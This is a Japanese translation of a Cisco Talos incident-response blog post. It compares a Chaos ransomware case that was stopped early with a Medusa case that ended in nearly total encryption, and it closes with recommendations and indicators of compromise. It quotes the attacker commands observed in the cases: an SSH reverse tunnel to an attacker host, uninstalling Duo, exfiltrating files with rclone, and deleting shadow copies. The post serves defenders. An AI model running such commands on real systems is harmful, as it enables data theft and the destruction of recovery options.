Cisco Japan Blog

Talos IR のランサムウェア対応事例と迅速なインシデント対応の重要性

2 min read



  • Cisco Talos が日常的に対応するランサムウェア事例には、攻撃ライフサイクルの早い段階で被害組織が対処を開始していれば被害を軽減または完全に回避できたであろうケースが少なくありません。ここでは、ランサムウェア攻撃への早期介入の重要性を示す例として、Cisco Talos インシデント対応チーム(Talos IR)が最近対処した 2 件のランサムウェア事例を取り上げます。
  • 第 1 のインシデントでは、悪意のある活動のアラートに気づいた被害者がすぐに Talos IR に連絡しました。Talos IR は迅速に対応し、以後発生し得る悪意のある活動に対抗することにより、環境内での暗号化の実行を防ぐことができました。
  • 一方、第 2 のインシデントでは、被害者は悪意のある活動のアラートを無視し、Talos IR に連絡が届いたのはランサムウェアバイナリの実行が始まってからでした。それから 1 日以上にわたり、Talos IR は分析のためのネットワークアクセスができず、その間に被害者のホストはほぼ 100% 暗号化されてしまいました。
  • ランサムウェア攻撃の成功とシビラティ(重大度)に関係し得る要因は、攻撃者の巧妙さや高度なツールなど数多くありますが、これら 2 件のランサムウェア事例は非常によく似ていることから、両攻撃の結果の違いにこれらの要因が大きく影響したとは考えられません。

はじめに

ランサムウェアの攻撃者は潜伏期間(最初のアクセスから暗号化までの期間)の短縮に日々努めているため、迅速なインシデント対応の心がけがますます重要になっています(情報源:Infosecurity Magazinepopup_iconCyberScooppopup_iconOrcapopup_iconThreatDownpopup_icon)。早期の介入と修復により、金銭的損失、風評被害、法的責任など、ランサムウェア攻撃による影響を大幅に軽減、あるいは完全に防ぐことができます。これは、Talos IR が最近扱った 2 件の事例の比較からも明らかです。

どちらの事例も、攻撃者が利用したツールpopup_iconや戦術、手法、手順(TTP)は類似しており、被害者はランサムウェアの実行前に不審な活動に関するアラートを受けていましたが、一方の事例ではネットワークの暗号化が 0% だったのに対し、他方の事例ではほぼ 100% 暗号化されてしまいました。

この暗号化はいくつかの重要な瞬間に生じた遅れに起因すると Talos は評価しています。まず、早期に警告があったにもかかわらず、ランサムウェアバイナリが実行されるまで連絡がなかったことから、Talos は IR 業務に着手できず、暗号化の開始を許すことになりました。次に、対応業務の開始から 30 時間以上被害者のネットワークにアクセスできず、その間に広範囲にわたり暗号化が行われました。Talos のデータによると、ランサムウェアの亜種の多くは、最初のアクセスからネットワークを完全に制御するまでに 24 ~ 48 時間しかかかりません。さらに、対応が遅れている間に攻撃者が防御策を講じたため、Talos は脅威の修復とネットワーク強化に向けた重要なステップであるシステムログの遡及分析を大幅に制限されました。

攻撃ライフサイクルの詳細

事例 1:暗号化を伴わないデータ窃取

4 月下旬、Chaos ランサムウェアの攻撃者は、ソーシャルエンジニアリングを通じて被害者の環境への最初の足掛かりを得ました。攻撃者はまず、あるユーザーに大量のスパムメールを送信した後、IT サポートを装って Microsoft Teams でそのユーザーに連絡を取りました。Microsoft Teams のセッション中、攻撃者はユーザーに Microsoft Quick Assist を起動させ、未知のログインページにログイン情報を入力させることで、最終的にそのアカウントにアクセスできるようになりました。同日、被害者はセキュリティ侵害のアラートを受け、Talos IR に脅威の軽減を依頼しました。そのため Talos IR は、アクティビティログを完全に削除または改ざんされる前に、ログを確認することができました。

攻撃者は侵害後の活動で LoLBin(Living-Off-The-Land binary、環境寄生型バイナリ)とデュアルユースツールを多用していました。また、Impacket の「atexec.py」モジュール(具体的には、タスク スケジューラー サービス)を使ってリモートからコマンドを実行しました。攻撃者は「ipconfig /all」(ネットワーク接続の一覧表示)、「nltest /dclist」(Active Directory(AD)内のドメインコントローラ(DC)の一覧表示)、「quser.exe」(ユーザーセッション情報の照会)などの Windows コマンドライン ユーティリティを使用して被害者の環境を調査し始めました。また、OpenSSH(リバースプロキシ SSH 接続を確立するための暗号化通信チャネルを提供するオープンソースのセキュア ネットワーク ユーティリティ スイート)を使用して、攻撃者の管理下にある IP アドレスに複数のアウトバウンド接続が行われていることも確認されました。

C:\Windows\System32\OpenSSH\ssh.exe -R :12840 -N REDACTED-p 443 -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no

攻撃者は、環境内でラテラルムーブメントを行うために、Microsoft リモートデスクトップと Advanced IP Scanner を使用して新しいアカウントへのアクセスを取得し、アカウントのパスワードを変更してユーザーをロックアウトすることで永続性を維持しました。

特に注目すべき点は、攻撃者が複数のシステム層(ワークステーション、サーバー、DC など)で別々のリモートモニタリングおよび管理(RMM)アプリケーションを使用して、攻撃作戦の複数のフェーズにおいてリモートアクセスを持続的に確保していたこと、また、次のようにそれぞれ若干異なる機能を実行していたことです。

  • Microsoft Quick Assist を使用し、ソーシャルエンジニアリングを用いて被害者に初回アクセス用のツールをインストールさせました。
  • 侵害されたシステムの大半で AnyDesk が見つかったため、AnyDesk がリモートアクセスの主な方法であったと考えられます。
  • OptiTune を利用して多数のホストに ScreenConnect RMM を展開しました。
  • SplashTop を利用して、少なくとも 1 つのホストでアクティビティを列挙しました。

攻撃者は、ホストから Duo をアンインストールするなど、検出を回避するための予防措置も講じました。

C:\WINDOWS\system32\cmd.EXE, /c, wmic, product, where, name=Duo Authentication for Windows Logon x64, call, uninstall, /nointeractive:

以下のように、名前を変更した Rclone 実行ファイルをコマンドラインから実行し、ネットワーク共有からファイルをコピーしていました。

wininit.exe, copy, --max-age, 1y, --exclude, *{psd,7z,mox,pst,FIT,FIL,MOV,mdb,iso,exe,dll,wav,png,db,log,HEIC,dwg,tmp,vhdx,msi}, \\REDACTED\data, REDACTED/data, -q, --ignore-existing, --auto-confirm, --multi-thread-streams, 25, --transfers, 15, --b2-disable-checksum, -P

最後に、最初のアクセスからわずか数時間後、攻撃者は「backup.sh」スクリプト(ESXi ホストに見られる通常のプロセス)を起動しました。Talos IR は、攻撃者がこのスクリプトを利用してランサムウェアの実行ファイルを配信したのではないかと疑っています。被害者の VPN 上のデータを暗号化しようとする試みが確認されましたが、最終的には失敗に終わりました。

事例 2:ほぼ 100% の暗号化

第 2 の事例では、シスコの Managed Detection and Response(MDR)が悪意のある活動についてアラートを発したにもかかわらず、被害者はこれを無視し、Medusa ランサムウェアのバイナリの実行が始まって初めて Talos IR に連絡が届きました。それから 1 日以上にわたり、Talos IR は分析のためのネットワークアクセスができず、その間に被害者のホストはほぼ 100% 暗号化されてしまいました。

暗号化後に残った限られたログを遡及的に分析した結果、この攻撃者も同じくデュアルユースツールを使用していることが明らかになりました。リモートアクセスには、正規の RMM ツールである SimpleHelp が使用されていました。このツールはランサムウェア攻撃者に悪用されることが多く、2025 年 1 月以降、パストラバーサルに日常的に悪用されています(CVE-2024-57727popup_icon)。Talos IR は、不審な IP アドレスからのリモートデスクトップ接続、悪用されることの多い Brute Ratel C4(BRC4)レッドチームツールからのビーコンアクティビティ、そしてデータ収集に利用できる Windows API の呼び出しも確認しました。

  • Getnativesysteminfo は、プロセッサの種類、プロセッサの数、メモリページサイズなど、システムのベースとなるハードウェアアーキテクチャと特性を取得します。
  • Telemetry:api_invoke は、Telemetry API の呼び出しです。攻撃者は、api_invoke イベントを監視またはトリガーすることで、どの API が利用可能か、どのユーザーまたはサービスがどの API を呼び出しているか、どのクラウドサービスが使用されているかを把握し、対応する「telemetry:api_invoke」ログから環境を列挙することができます。
  • Bcryptgeneratesymmetrickey は AES 復号用のキーを生成します。

攻撃者は、SimpleHelp のコンポーネントである JWrapper を使用してコマンドアンドコントロール(C2)を確立しました。JWrapper は IT サポートでよく使用されるため、悪意のあるものとは判定されない可能性があります。また、JWrapper は Java アプリケーションを Windows、macOS、Linux のネイティブ実行形式にパッケージ化するように設計されているため、ファイルを密かに実行し、データを漏洩させる目的にも利用できます。攻撃者は今回の攻撃で JWrapper を使用し、Windows の PromptOnSecureDektop レコードを False に設定することで、レジストリのユーザーアクセス制御を無効にするファイルを実行しました。

C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access Bundle-00112084494\JWrapperTemp-1745261021-3-app\bin\ windowslauncher.exe
\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop

JWrapper はデータ漏洩にも使用された可能性があります。

C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access Bundle-00112084494\JWrapperTemp-1745261021-3-app\bin\windowslauncher.exe

攻撃者は、不正アクセスによって System32 フォルダ内のファイルをリモートで読み取って変更し、このフォルダからボリュームシャドウコピーを削除しようとしました。System32 フォルダは Windows OS に不可欠な部分であり、システムが正常に機能するうえで欠かせない重要なファイルが含まれています。ボリュームシャドウコピーの削除は、データのリカバリを阻止するための一般的な戦術です。

C:\Windows\System32\vssadmin.exe 'delete' 'shadows' '/shadow={5aa57685-c258-4396-b702-6722ab58e603}

攻撃者は、PsExec のリモートコピーと実行を介して、System32 フォルダ内で Impacket も実行しました。

C:\Windows\system32\services.exe, C:\Windows\system32\msiexec.exe /V, C:\Windows\syswow64\MsiExec.exe -Embedding 27A094D718378410D2002AE3023D3731 E Global\MSI0000

分析

Talos IR は、両事例間の影響の違いをもたらした主な要因は被害者の対応のタイミングにあると評価しています。攻撃者の洗練度、被害者のエンドポイントセキュリティ、Talos IR の対応など、他の要因はいずれもよく似ていました。どちらの攻撃も、ツールの洗練度は類似しており、攻撃ライフサイクル全体を通して LoLBin とデュアルユースツールが多用されていました。例として Msiexec、WMIC、PowerShell といった LoLBin と正規の RMM ツールの共用が挙げられます。また、どちらの攻撃も、新しいペイロードを展開することなく、SMB または WMI 経由でリモートからコマンドを実行するために Impacket を使用しており、マルウェアを拡散するために ADMIN$ 管理共有を使用していました。より洗練された攻撃者であれば、最近発見された Betruger バックドアpopup_iconに似た、ランサムウェア攻撃ではほとんど見られないカスタムマルウェアを選択した可能性があります。

どちらの事例も、広範なネットワークアクセスを獲得するために使用された戦術、手法、手順(TTP)の洗練度は同程度でした。攻撃者はファイル、ログ、ツールを削除または変更することで検出と分析を回避しようとし、被害者の System32 フォルダと管理者アカウントの侵害に成功しました。

Talos IR は、これら 2 件の事例に多少違いがあることは認めていますが、それらは重大な差を生むものではありません。たとえば両事例では、IP スキャン用としてそれぞれ異なる正規の有料ソフトウェアが使用され、RMM ツールもそれぞれ異なるものが使用されましたが、これらの相違によって被害者への影響度にそれほど大きな差は生まれなかったと考えられます。

また、どちらの被害者も、旧バージョンである PowerShell 1.0 を使用しているというエンドポイントセキュリティ上ほぼ同じ脆弱性を抱えており、この脆弱性が悪用されたことが確認されました。PowerShell 1.0 には、後継バージョンに搭載されている重要なセキュリティ機能がいくつか欠けており、悪意のある活動の検出と分析が困難です。たとえば PowerShell 1.0 の実行ポリシーは、インライン実行「powershell.exe -ExecutionPolicy Bypass」を使用するか、メモリまたはレジストリ内のポリシー値を変更することで簡単にバイパスできます。これは、スクリプトがデジタル署名や検証なしで実行できることを意味し、ランサムウェアのペイロードを実行する一般的な手段となっています。さらに、PowerShell 1.0 は、後継バージョンで .NET クラスや API へのアクセスを制限する制約言語モード(CLM)をサポートしておらず、.NET クラスや API がラテラルムーブメントや権限昇格に悪用される可能性があります。CLM がない場合、攻撃者はレジストリ操作、WMI クエリ、COM オブジェクトの相互作用、生の .NET アセンブリの読み込みなど、PowerShell の機能全体に無制限にアクセスできるようになります。これらはすべて、永続性の確立や権限昇格に使用できます。

最後に、どちらの被害者も、ランサムウェアの実行前に悪意のある活動に関する通知を受け取りました。連絡を受けた後、Talos は両被害者に対して同レベルの支援を提供しました。

タイムリーなログ分析による迅速な復旧

第 1 の事例では、被害者から早期に連絡を受け、その後も継続的にコミュニケーションが取れたことにより、Talos IR は削除または改ざんされる前のシステムログにアクセスできました。これが、暗号化の回避につながったと考えられます。次の多くの理由から、ログはランサムウェア攻撃への対応において重要な要素です。

  • 悪用されたネットワークセキュリティの弱点を特定し、修正につなげる。
  • どのデータが侵害されたかを把握することで、考えられる余波を理解し、影響を受けるお客様に通知する。
  • 不審な振る舞いを示す逸脱を簡単に検知できるようにベースラインを確立する(ランサムウェアの攻撃者の多くが正規のツールを利用していることを考えると特に重要)。
  • 攻撃者が日常的に使用するツールと TTP を特定する。これにより、今後の悪意のある活動を検知する方法や、その防止のために検出システムを配置すべき場所を把握できるほか、活動を行っている攻撃者を特定できる可能性もある。
  • 攻撃者がアクセスする可能性があるデータを保護するために、攻撃者の目的(金銭の窃取やスパイ活動など)を特定する。
  • 特定の標的が侵害されることを示す明確な経路を観察したり、侵害時に失敗した試みを確認したりすることで、標的を事前に強化する。

活動に共通点があったことから、Talos IR は修復に関して各被害者に類似した推奨事項を提供しましたが、Talos IR の対応を依頼するまでに時間がかかった事例では、確認可能なログが限られており、発生した悪意のある活動の全容と、攻撃者によるネットワークの侵害方法を Talos が把握できなかったため、被害者が受け取った推奨事項はやや一般的な内容になりました。

ログへのアクセスが制限される場合の推奨事項 ログに基づいてカスタマイズした
推奨事項
RMM ソフトウェアの悪用の対策 会社から許可された RMM ソフトウェアのみ使用を許可し、それ以外の RMM はすべてブロックします。 悪意のある SSH リモート接続に基づいて、悪意のある IP を必ずブロックします。また、ファイアウォールレベルでの SSH のブロックも検討してください。
パスワードの保護 すべての特権アカウント、サービスアカウント、ユーザーアカウント、ローカルアカウントを含むすべてのアカウントのパスワードの一斉リセットを実行します。 攻撃者はホストにアクセスしており、ブラウザに保存されている非暗号化データにアクセスできていました。今後こうした脆弱性を防ぐには、ユーザーがブラウザにログイン情報や PII(個人を特定できる情報)を保存できないように GPO を実装してください。
攻撃者によるラテラルムーブメントの阻止 ログを十分に確認できないため、推奨事項を提供できません。 ハイブリッド AD アプローチから Entra ID への移行を検討してください。そうしておけば、環境内での攻撃者のラテラルムーブメントを防げていたと考えられます。

推奨事項

  • フィッシング攻撃やソーシャルエンジニアリングに対する意識を高めます。ランサムウェアの攻撃者は、さまざまな手法を駆使して初回アクセスを行うことに長けているため、ユーザー教育が非常に重要です。フィッシング攻撃を見抜き、MFA バイパス手法への対策を行い、不正アクセスの報告先を把握できるようにユーザーを教育します。
  • PowerShell などのシステム管理ツールの不必要な使用や不正使用を監視して防止し、ゼロトラストの原則を遵守します。正当な業務目的でこれらのツールを必要とする従業員のみにアクセスを制限してください。これらのツールの使用はログに記録し、監査する必要があります。
  • ログの改ざんや削除を防止します。組織全体のユーザーまたはロールが特定のサービスにアクセスしたり、サービス内で特定のアクションを実行したりできないように、クラウドベースのリソースに対するサービス制御ポリシー(SCP)の作成を検討してください。たとえば SCP を使用すると、ユーザーによるログの削除、仮想プライベートクラウド(VPC)の設定の更新、ログ設定の変更を制限できます。さらに、プロセス実行イベントをログに記録し、Sysmon を導入して Windows デバイスのログ機能を強化してください。
  • RMM とデュアルユースツールの使用を制限します。RMM ソフトウェアの実行ログを確認して、RMM ソフトウェアがメモリにのみロードされているなどの異常な使用を検出し、ネットワーク境界で一般的な RMM ポートおよびプロトコルにおける受信接続と送信接続の両方をブロックします。
  • 不正な開示や漏洩を防ぐために、データ損失防止(DLP)戦略を採用します。これには、データ分類ポリシー、データ取り扱いポリシー、ユーザーの意識向上とトレーニング、そして不正なデータ転送の試みを識別してブロックできる DLP ソフトウェアが含まれます。

保護情報

Chaos

Unix.Malware.Chaos-6474834-0

シグニチャ名:Unix.Malware.Chaos-6474902-0

45975

Medusa

63929, 63928

300998

33058-33060

シグニチャ名:Andr.Ransomware.Medusa-10033530-0

シグニチャ名:PUA.Win.Tool.BestCrypt-10033531-0

シグニチャ名:Win.Ransomware.Medusa_Note-10033532-0

侵害の指標(IOC)

Chaos

ファイル名 SHA256 ステータス/説明
Wavesor.exe 19ab3c8645d6806ae8a1dad707a86aba344a48d1612aeb5aa145f96ac0e24a03 重要な情報を取得するために使用できるマルウェア
wininit.exe 5540f27f12db5a9e954727079665a282f905a0be787b76d798ca79a318d197f5 名前が変更された rclone
Advanced_IP_Scanner_2.5.4594.1.exe 26d5748ffe6bd95e3fee6ce184d388a1a681006dc23a0f08d53c083c593c193 検出に使用される IP スキャナ
screensaver.exe 87b3e3462263d7d42dea2bac6c3144181bab22092276f527a94a33af473066d5 ScreenConnect
otservice.exe b5c63f895d27d0572289cb49058ea83b1e49c46a62ca51b4ab44d119111594a4 ScreenConnect を展開するために使用される OptiTune RMM
supportcenter.exe 1ede8d91db625a605535488d1c36a5ea7ba3950194cabe7664ffa7ed6a9aab45 OptiTune RMM
bvscript.exe 9d2fe8a4a229ed2990e33a0330a00c03a415435c3cabd9a42dd882673522bee4 OptiTune RMM Bravura スクリプトホストツール
otpowershell.exe 10a87144386b2869d1bbc40e50f6960d4eb4316d1fd1c1df8708361a7b837b98 OptiTune PowerShell ツール
remoteservice.exe 4b6ff966ec6509e86c4a1cbf71d71bf434e08e0aae097a57015ad493db4a3912 OptiTune リモートサービスツール
realtimeagent.exe 6a3072a2367329b564c9bf77302a5fbf66673fb471c22fc56a12e901c4d90477 OptiTune リアルタイム エージェント ツール
advanced_ip_scanner.exe 4b036cc9930bb42454172f888b8fde1087797fc0c9d31ab546748bd2496bd3e5 検出に使用される IP スキャナ
goodsync.exe 8127614d1906befc82ebc75fc0992e7dbad64ed2233fe316df611bf89ac4df2e データ漏洩ツール
screenconnect.exe 05016485b683ef6d40bfd805702924909197ee2483a66ffc8a22dc03e4891045 ホスト「PKIWEBSVR」に配置される不明な実行ファイル
syncro.installer.exe 845f4d73a0d96898535593c411d924d8c8c3af1dd3ead5f824242bb841d53c8e Syncro RMM インストーラ
setuputil.exe 1837087e75de428c18acec7f2ef7576752396a3a1ef15450230734e9ee194b28 Splashtop Streamer インストーラ
anydesk.exe 6ccea6a959128112613d7a82c067f8ccc78f05f1f8f47348fc9fecf269f0f21a AnyDesk の悪用
QuickAssist.exe ms-quick-assist 8f67faad634acf0f2971caf8b7ac96e8f05de795b74feec8b82ea168b7be820b 「最初の被害者」にソーシャルエンジニアリングを通じて実行させた実行ファイル
splashtop.exe 03a613c62ae7470e70e0197ea5133625308dc2ac2c5574608d2b6e20c8f94015 Splashtop
splashtop_sos.exe 61f281c24846d311031521d13c933c42b33c7283d425456f00cf0ef3ffb04863 Splashtop

 

ドメイン、URI パス、または IP アドレス ステータス/説明
144.172.103[.]42 リバースプロキシ SSH 接続を確立するために使用される、攻撃者の管理下にある IP アドレス
45.61.134[.]36 リバースプロキシ SSH 接続を確立するために使用される、攻撃者の管理下にある IP アドレス
civicoscolombia[.]com 悪評があり、データ漏洩の兆候が見られるドメイン
104.21.44[.]57’ 悪意のあるドメイン civicoscolombia[.]com の IP

Medusa

ファイル名 SHA256 ステータス/説明
windowslauncher.exe

remote access.exe

11e7f8b671ed39497c8561b0ecd13496080681c21a457d6079817a90de553bf1’ SimpleHelp リモート アクセス クライアント
storm.exe ee6d24410a8cf31d672d2a47466b76ad287c7ba016d3711490f0f607b1dc0be3 SimpleHelp リモート アクセス クライアント
psexecsvc.exe cc14df781475ef0f3f2c441d03a622ea67cd86967526f8758ead6f45174db78e Microsoft Sysinternals PsExec
Remote AccessLauncher.exe 1e43e202a6e5d3059c3901a63fd69b32a7c0719c9f4c4f592a71c85e08e5d188 SimpleHelp リモート アクセス クライアント
session_win.exe 6e5f719d4c319e6aab1440f149d8d1dcb512a8f558b62311a0a5d5af366074ff SimpleHelp リモート アクセス クライアント
ipscan-win64-3.0-beta6.exe 8c1ec962a5e01d8717f6391af96c973600797c5285bcac1ac939a8d59e40e64e Angry IP Scanner
remote access service.exe dfee42845dd0ba873411df0ea1a917a7f2c1ddd9c024d325ce76aea90a9c9c51

 

733fc3b203e9b46d1dd8bfdeea3efd2adc569ef6806bdc15b077623670ad52e1

 

34df37643dab68d3d3b36c415b6b9fd1842c475c088007081ee613a780fd1c2c

SimpleHelp リモート アクセス クライアント
winpty-agent64.exe 586a2d7d3092b364db3cbb5a7dbc83cf7ef233338c4172c1bae6587f8b374cab 端末接続を管理するための SimpleHelp ユーティリティ

 

ドメイン、URI パス、または IP アドレス ステータス/説明
213.183.63[.]41 コマンドアンドコントロールの SimpleHelp リモートアクセスの IP アドレス
89.36.161[.]17 コマンドアンドコントロールの SimpleHelp リモートアクセスの IP アドレス
143.110.243[.]154 不審なデータ漏洩の IP アドレス

 

本稿は 2025 年 7 月 16 日にTalos Grouppopup_icon のブログに投稿された「Talos IR ransomware engagements and the significance of timeliness in incident responsepopup_icon」の抄訳です。

コメントを書く